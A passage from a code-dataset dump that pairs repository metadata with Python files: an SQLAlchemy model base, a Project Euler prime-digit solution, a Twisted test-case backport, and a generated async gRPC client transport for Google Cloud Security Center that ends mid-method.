class _DebugQueryTuple(tuple):
statement = property(itemgetter(0))
parameters = property(itemgetter(1))
start_time = property(itemgetter(2))
end_time = property(itemgetter(3))
context = property(itemgetter(4))
@property
def duration(self):
return self.end_time - self.start_time
def __repr__(self):
return '<query statement="%s" parameters=%r duration=%.03f>' % (
self.statement,
self.parameters,
self.duration
)
class _ModelTableNameDescriptor(object):
_camelcase_re = re.compile(r'([A-Z]+)(?=[a-z0-9])')
def __get__(self, obj, type):
tablename = type.__dict__.get('__tablename__')
if not tablename:
def _join(match):
word = match.group()
if len(word) > 1:
return ('_%s_%s' % (word[:-1], word[-1])).lower()
return '_' + word.lower()
tablename = self._camelcase_re.sub(_join, type.__name__).lstrip('_')
setattr(type, '__tablename__', tablename)
return tablename
class Model(object):
"""Baseclass for custom user models."""
#: the query class used. The :attr:`query` attribute is an instance
#: of this class. By default a :class:`BaseQuery` is used.
query_class = orm.Query
#: an instance of :attr:`query_class`. Can be used to query the
#: database for instances of this model.
query = None
# #: arguments for the mapper
# __mapper_cls__ = _SignalTrackingMapper
__tablename__ = _ModelTableNameDescriptor()
#def get_engine():
# return
#
#def _create_scoped_session(db):
# return orm.scoped_session(partial(_SignallingSession, db))
#
class _QueryProperty(object):
def __init__(self):
database_setup.connect(self.__on_database_setup)
def __on_database_setup(self, sender):
self.db = sender
def __get__(self, obj, type):
try:
mapper = orm.class_mapper(type)
if mapper:
return type.query_class(mapper, session=self.db.get_session())
except UnmappedClassError:
return None
db.and_ = and_
db.or_ = or_
#del and_, or_
Model = declarative_base(cls=Model, name='Model')
Model.query = _QueryProperty()
metadata = Model.metadata
db.metadata = metadata
class SchemaVersion(Model):
"""SQLAlchemy-Migrate schema version control table."""
__tablename__ = 'migrate_version'
repository_id = db.Column(db.String(255), primary_key=True)
repository_path = db.Column(db.Text)
version = db.Column(db.Integer)
def __init__(self, repository_id, repository_path, version):
self.repository_id = repository_id
self.repository_path = repository_path
self.version = version
| [
"ufs@ufsoft.org"
] | ufs@ufsoft.org |
e6099d9bca20c1e703ed995f7d4e83cb35feb56d | 13d222bc3332378d433835914da26ed16b583c8b | /src/pemjh/challenge111/main.py | 55ded9f15d33ecae72908afa7c8d34a24369a64e | [] | no_license | mattjhussey/pemjh | c27a09bab09cd2ade31dc23fffac07374bea9366 | 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | refs/heads/master | 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | """ Challenge111 """
# pylint: disable=missing-docstring
from pemjh.numbers import is_prime
def build_nums(repeated, other):
if len(repeated) > 0:
if len(repeated) > 1 or len(other) > 0:
for num in build_nums(repeated[1:], other):
yield [repeated[0]] + num
else:
yield [repeated[0]]
if len(other) > 0:
if len(repeated) > 0 or len(other) > 1:
for num in build_nums(repeated, other[1:]):
yield [other[0]] + num
else:
yield [other[0]]
def main():
""" challenge111 """
# pylint: disable=invalid-name
M = [8, 9, 8, 9, 9, 9, 9, 9, 8, 9]
S = []
for i in range(10):
s = 0
# use M[i] to build up all possible numbers
for m in [list(("%0" + str(10 - M[i]) + "d") % m)
for m in range(0, 10**(10 - M[i]))]:
if not any(int(c) == i for c in m):
for num in [int("".join(b))
for b in build_nums([str(i)] * M[i], m)]:
if num >= 10**(9) and is_prime(num):
# Check each for primality
s += num
S.append(s)
return sum(S)
| [
"matthew.hussey@googlemail.com"
] | matthew.hussey@googlemail.com |
deaf64a7afcb6d1a9c81b881eef0fa76f4e156d2 | 1f4239936f18b709e82a965022d5d549238bb620 | /klein/test/util.py | 9755e2b9e215d85c5b5aa3c33130e6e879e8b915 | [
"MIT"
] | permissive | WnP/klein | 2165625dcbacb77bc2789dad6c4379685d634d0b | a07a6742abbd2418f2b42bf951ab11de23885c0f | refs/heads/master | 2020-12-25T21:12:27.192758 | 2014-05-14T22:27:06 | 2014-05-14T22:27:06 | 19,759,744 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,926 | py | import twisted
from twisted.trial.unittest import TestCase
from twisted.python import failure
from twisted.python.versions import Version
if twisted.version < Version('twisted', 13, 1, 0):
class TestCase(TestCase):
def successResultOf(self, deferred):
result = []
deferred.addBoth(result.append)
if not result:
self.fail(
"Success result expected on %r, found no result instead" % (
deferred,))
elif isinstance(result[0], failure.Failure):
self.fail(
"Success result expected on %r, "
"found failure result instead:\n%s" % (
deferred, result[0].getTraceback()))
else:
return result[0]
def failureResultOf(self, deferred, *expectedExceptionTypes):
result = []
deferred.addBoth(result.append)
if not result:
self.fail(
"Failure result expected on %r, found no result instead" % (
deferred,))
elif not isinstance(result[0], failure.Failure):
self.fail(
"Failure result expected on %r, "
"found success result (%r) instead" % (deferred, result[0]))
elif (expectedExceptionTypes and
not result[0].check(*expectedExceptionTypes)):
expectedString = " or ".join([
'.'.join((t.__module__, t.__name__)) for t in
expectedExceptionTypes])
self.fail(
"Failure of type (%s) expected on %r, "
"found type %r instead: %s" % (
expectedString, deferred, result[0].type,
result[0].getTraceback()))
else:
return result[0]
| [
"haggardii@gmail.com"
] | haggardii@gmail.com |
b5199780ed75b7319552b04200ef132351c6e4be | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/cloud/securitycenter/v1p1beta1/securitycenter-v1p1beta1-py/google/cloud/securitycenter_v1p1beta1/services/security_center/transports/grpc_asyncio.py | d39b77cab1dcfc5bbc94c50ed491e85f795a3798 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40,798 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.securitycenter_v1p1beta1.types import finding
from google.cloud.securitycenter_v1p1beta1.types import finding as gcs_finding
from google.cloud.securitycenter_v1p1beta1.types import notification_config
from google.cloud.securitycenter_v1p1beta1.types import notification_config as gcs_notification_config
from google.cloud.securitycenter_v1p1beta1.types import organization_settings
from google.cloud.securitycenter_v1p1beta1.types import organization_settings as gcs_organization_settings
from google.cloud.securitycenter_v1p1beta1.types import security_marks as gcs_security_marks
from google.cloud.securitycenter_v1p1beta1.types import securitycenter_service
from google.cloud.securitycenter_v1p1beta1.types import source
from google.cloud.securitycenter_v1p1beta1.types import source as gcs_source
from google.iam.v1 import iam_policy_pb2 as iam_policy # type: ignore
from google.iam.v1 import policy_pb2 as giv_policy # type: ignore
from google.longrunning import operations_pb2 as operations # type: ignore
from google.protobuf import empty_pb2 as empty # type: ignore
from .base import SecurityCenterTransport, DEFAULT_CLIENT_INFO
from .grpc import SecurityCenterGrpcTransport
class SecurityCenterGrpcAsyncIOTransport(SecurityCenterTransport):
"""gRPC AsyncIO backend transport for SecurityCenter.
V1p1Beta1 APIs for Security Center service.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'securitycenter.googleapis.com',
credentials: credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
scopes = scopes or cls.AUTH_SCOPES
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
**kwargs
)
def __init__(self, *,
host: str = 'securitycenter.googleapis.com',
credentials: credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def create_source(self) -> Callable[
[securitycenter_service.CreateSourceRequest],
Awaitable[gcs_source.Source]]:
r"""Return a callable for the create source method over gRPC.
Creates a source.
Returns:
Callable[[~.CreateSourceRequest],
Awaitable[~.Source]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'create_source' not in self._stubs:
self._stubs['create_source'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/CreateSource',
request_serializer=securitycenter_service.CreateSourceRequest.serialize,
response_deserializer=gcs_source.Source.deserialize,
)
return self._stubs['create_source']
@property
def create_finding(self) -> Callable[
[securitycenter_service.CreateFindingRequest],
Awaitable[gcs_finding.Finding]]:
r"""Return a callable for the create finding method over gRPC.
Creates a finding. The corresponding source must
exist for finding creation to succeed.
Returns:
Callable[[~.CreateFindingRequest],
Awaitable[~.Finding]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'create_finding' not in self._stubs:
self._stubs['create_finding'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/CreateFinding',
request_serializer=securitycenter_service.CreateFindingRequest.serialize,
response_deserializer=gcs_finding.Finding.deserialize,
)
return self._stubs['create_finding']
@property
def create_notification_config(self) -> Callable[
[securitycenter_service.CreateNotificationConfigRequest],
Awaitable[gcs_notification_config.NotificationConfig]]:
r"""Return a callable for the create notification config method over gRPC.
Creates a notification config.
Returns:
Callable[[~.CreateNotificationConfigRequest],
Awaitable[~.NotificationConfig]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'create_notification_config' not in self._stubs:
self._stubs['create_notification_config'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/CreateNotificationConfig',
request_serializer=securitycenter_service.CreateNotificationConfigRequest.serialize,
response_deserializer=gcs_notification_config.NotificationConfig.deserialize,
)
return self._stubs['create_notification_config']
@property
def delete_notification_config(self) -> Callable[
[securitycenter_service.DeleteNotificationConfigRequest],
Awaitable[empty.Empty]]:
r"""Return a callable for the delete notification config method over gRPC.
Deletes a notification config.
Returns:
Callable[[~.DeleteNotificationConfigRequest],
Awaitable[~.Empty]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'delete_notification_config' not in self._stubs:
self._stubs['delete_notification_config'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/DeleteNotificationConfig',
request_serializer=securitycenter_service.DeleteNotificationConfigRequest.serialize,
response_deserializer=empty.Empty.FromString,
)
return self._stubs['delete_notification_config']
@property
def get_iam_policy(self) -> Callable[
[iam_policy.GetIamPolicyRequest],
Awaitable[giv_policy.Policy]]:
r"""Return a callable for the get iam policy method over gRPC.
Gets the access control policy on the specified
Source.
Returns:
Callable[[~.GetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_iam_policy' not in self._stubs:
self._stubs['get_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GetIamPolicy',
request_serializer=iam_policy.GetIamPolicyRequest.SerializeToString,
response_deserializer=giv_policy.Policy.FromString,
)
return self._stubs['get_iam_policy']
@property
def get_notification_config(self) -> Callable[
[securitycenter_service.GetNotificationConfigRequest],
Awaitable[notification_config.NotificationConfig]]:
r"""Return a callable for the get notification config method over gRPC.
Gets a notification config.
Returns:
Callable[[~.GetNotificationConfigRequest],
Awaitable[~.NotificationConfig]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_notification_config' not in self._stubs:
self._stubs['get_notification_config'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GetNotificationConfig',
request_serializer=securitycenter_service.GetNotificationConfigRequest.serialize,
response_deserializer=notification_config.NotificationConfig.deserialize,
)
return self._stubs['get_notification_config']
@property
def get_organization_settings(self) -> Callable[
[securitycenter_service.GetOrganizationSettingsRequest],
Awaitable[organization_settings.OrganizationSettings]]:
r"""Return a callable for the get organization settings method over gRPC.
Gets the settings for an organization.
Returns:
Callable[[~.GetOrganizationSettingsRequest],
Awaitable[~.OrganizationSettings]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_organization_settings' not in self._stubs:
self._stubs['get_organization_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GetOrganizationSettings',
request_serializer=securitycenter_service.GetOrganizationSettingsRequest.serialize,
response_deserializer=organization_settings.OrganizationSettings.deserialize,
)
return self._stubs['get_organization_settings']
@property
def get_source(self) -> Callable[
[securitycenter_service.GetSourceRequest],
Awaitable[source.Source]]:
r"""Return a callable for the get source method over gRPC.
Gets a source.
Returns:
Callable[[~.GetSourceRequest],
Awaitable[~.Source]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_source' not in self._stubs:
self._stubs['get_source'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GetSource',
request_serializer=securitycenter_service.GetSourceRequest.serialize,
response_deserializer=source.Source.deserialize,
)
return self._stubs['get_source']
@property
def group_assets(self) -> Callable[
[securitycenter_service.GroupAssetsRequest],
Awaitable[securitycenter_service.GroupAssetsResponse]]:
r"""Return a callable for the group assets method over gRPC.
Filters an organization's assets and groups them by
their specified properties.
Returns:
Callable[[~.GroupAssetsRequest],
Awaitable[~.GroupAssetsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'group_assets' not in self._stubs:
self._stubs['group_assets'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GroupAssets',
request_serializer=securitycenter_service.GroupAssetsRequest.serialize,
response_deserializer=securitycenter_service.GroupAssetsResponse.deserialize,
)
return self._stubs['group_assets']
@property
def group_findings(self) -> Callable[
[securitycenter_service.GroupFindingsRequest],
Awaitable[securitycenter_service.GroupFindingsResponse]]:
r"""Return a callable for the group findings method over gRPC.
Filters an organization or source's findings and groups them by
their specified properties.
To group across all sources provide a ``-`` as the source id.
Example:
/v1p1beta1/organizations/{organization_id}/sources/-/findings
Returns:
Callable[[~.GroupFindingsRequest],
Awaitable[~.GroupFindingsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'group_findings' not in self._stubs:
self._stubs['group_findings'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/GroupFindings',
request_serializer=securitycenter_service.GroupFindingsRequest.serialize,
response_deserializer=securitycenter_service.GroupFindingsResponse.deserialize,
)
return self._stubs['group_findings']
@property
def list_assets(self) -> Callable[
[securitycenter_service.ListAssetsRequest],
Awaitable[securitycenter_service.ListAssetsResponse]]:
r"""Return a callable for the list assets method over gRPC.
Lists an organization's assets.
Returns:
Callable[[~.ListAssetsRequest],
Awaitable[~.ListAssetsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'list_assets' not in self._stubs:
self._stubs['list_assets'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/ListAssets',
request_serializer=securitycenter_service.ListAssetsRequest.serialize,
response_deserializer=securitycenter_service.ListAssetsResponse.deserialize,
)
return self._stubs['list_assets']
@property
def list_findings(self) -> Callable[
[securitycenter_service.ListFindingsRequest],
Awaitable[securitycenter_service.ListFindingsResponse]]:
r"""Return a callable for the list findings method over gRPC.
Lists an organization or source's findings.
To list across all sources provide a ``-`` as the source id.
Example:
/v1p1beta1/organizations/{organization_id}/sources/-/findings
Returns:
Callable[[~.ListFindingsRequest],
Awaitable[~.ListFindingsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'list_findings' not in self._stubs:
self._stubs['list_findings'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/ListFindings',
request_serializer=securitycenter_service.ListFindingsRequest.serialize,
response_deserializer=securitycenter_service.ListFindingsResponse.deserialize,
)
return self._stubs['list_findings']
@property
def list_notification_configs(self) -> Callable[
[securitycenter_service.ListNotificationConfigsRequest],
Awaitable[securitycenter_service.ListNotificationConfigsResponse]]:
r"""Return a callable for the list notification configs method over gRPC.
Lists notification configs.
Returns:
Callable[[~.ListNotificationConfigsRequest],
Awaitable[~.ListNotificationConfigsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'list_notification_configs' not in self._stubs:
self._stubs['list_notification_configs'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/ListNotificationConfigs',
request_serializer=securitycenter_service.ListNotificationConfigsRequest.serialize,
response_deserializer=securitycenter_service.ListNotificationConfigsResponse.deserialize,
)
return self._stubs['list_notification_configs']
@property
def list_sources(self) -> Callable[
[securitycenter_service.ListSourcesRequest],
Awaitable[securitycenter_service.ListSourcesResponse]]:
r"""Return a callable for the list sources method over gRPC.
Lists all sources belonging to an organization.
Returns:
Callable[[~.ListSourcesRequest],
Awaitable[~.ListSourcesResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'list_sources' not in self._stubs:
self._stubs['list_sources'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/ListSources',
request_serializer=securitycenter_service.ListSourcesRequest.serialize,
response_deserializer=securitycenter_service.ListSourcesResponse.deserialize,
)
return self._stubs['list_sources']
@property
def run_asset_discovery(self) -> Callable[
[securitycenter_service.RunAssetDiscoveryRequest],
Awaitable[operations.Operation]]:
r"""Return a callable for the run asset discovery method over gRPC.
Runs asset discovery. The discovery is tracked with a
long-running operation.
This API can only be called with limited frequency for an
organization. If it is called too frequently the caller will
receive a TOO_MANY_REQUESTS error.
Returns:
Callable[[~.RunAssetDiscoveryRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'run_asset_discovery' not in self._stubs:
self._stubs['run_asset_discovery'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/RunAssetDiscovery',
request_serializer=securitycenter_service.RunAssetDiscoveryRequest.serialize,
response_deserializer=operations.Operation.FromString,
)
return self._stubs['run_asset_discovery']
@property
def set_finding_state(self) -> Callable[
[securitycenter_service.SetFindingStateRequest],
Awaitable[finding.Finding]]:
r"""Return a callable for the set finding state method over gRPC.
Updates the state of a finding.
Returns:
Callable[[~.SetFindingStateRequest],
Awaitable[~.Finding]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'set_finding_state' not in self._stubs:
self._stubs['set_finding_state'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/SetFindingState',
request_serializer=securitycenter_service.SetFindingStateRequest.serialize,
response_deserializer=finding.Finding.deserialize,
)
return self._stubs['set_finding_state']
@property
def set_iam_policy(self) -> Callable[
[iam_policy.SetIamPolicyRequest],
Awaitable[giv_policy.Policy]]:
r"""Return a callable for the set iam policy method over gRPC.
Sets the access control policy on the specified
Source.
Returns:
Callable[[~.SetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'set_iam_policy' not in self._stubs:
self._stubs['set_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/SetIamPolicy',
request_serializer=iam_policy.SetIamPolicyRequest.SerializeToString,
response_deserializer=giv_policy.Policy.FromString,
)
return self._stubs['set_iam_policy']
@property
def test_iam_permissions(self) -> Callable[
[iam_policy.TestIamPermissionsRequest],
Awaitable[iam_policy.TestIamPermissionsResponse]]:
r"""Return a callable for the test iam permissions method over gRPC.
Returns the permissions that a caller has on the
specified source.
Returns:
Callable[[~.TestIamPermissionsRequest],
Awaitable[~.TestIamPermissionsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'test_iam_permissions' not in self._stubs:
self._stubs['test_iam_permissions'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/TestIamPermissions',
request_serializer=iam_policy.TestIamPermissionsRequest.SerializeToString,
response_deserializer=iam_policy.TestIamPermissionsResponse.FromString,
)
return self._stubs['test_iam_permissions']
@property
def update_finding(self) -> Callable[
[securitycenter_service.UpdateFindingRequest],
Awaitable[gcs_finding.Finding]]:
r"""Return a callable for the update finding method over gRPC.
Creates or updates a finding. The corresponding
source must exist for a finding creation to succeed.
Returns:
Callable[[~.UpdateFindingRequest],
Awaitable[~.Finding]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_finding' not in self._stubs:
self._stubs['update_finding'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateFinding',
request_serializer=securitycenter_service.UpdateFindingRequest.serialize,
response_deserializer=gcs_finding.Finding.deserialize,
)
return self._stubs['update_finding']
@property
def update_notification_config(self) -> Callable[
[securitycenter_service.UpdateNotificationConfigRequest],
Awaitable[gcs_notification_config.NotificationConfig]]:
r"""Return a callable for the update notification config method over gRPC.
Updates a notification config. The following update fields are
allowed: description, pubsub_topic, streaming_config.filter
Returns:
Callable[[~.UpdateNotificationConfigRequest],
Awaitable[~.NotificationConfig]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_notification_config' not in self._stubs:
self._stubs['update_notification_config'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateNotificationConfig',
request_serializer=securitycenter_service.UpdateNotificationConfigRequest.serialize,
response_deserializer=gcs_notification_config.NotificationConfig.deserialize,
)
return self._stubs['update_notification_config']
@property
def update_organization_settings(self) -> Callable[
[securitycenter_service.UpdateOrganizationSettingsRequest],
Awaitable[gcs_organization_settings.OrganizationSettings]]:
r"""Return a callable for the update organization settings method over gRPC.
Updates an organization's settings.
Returns:
Callable[[~.UpdateOrganizationSettingsRequest],
Awaitable[~.OrganizationSettings]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
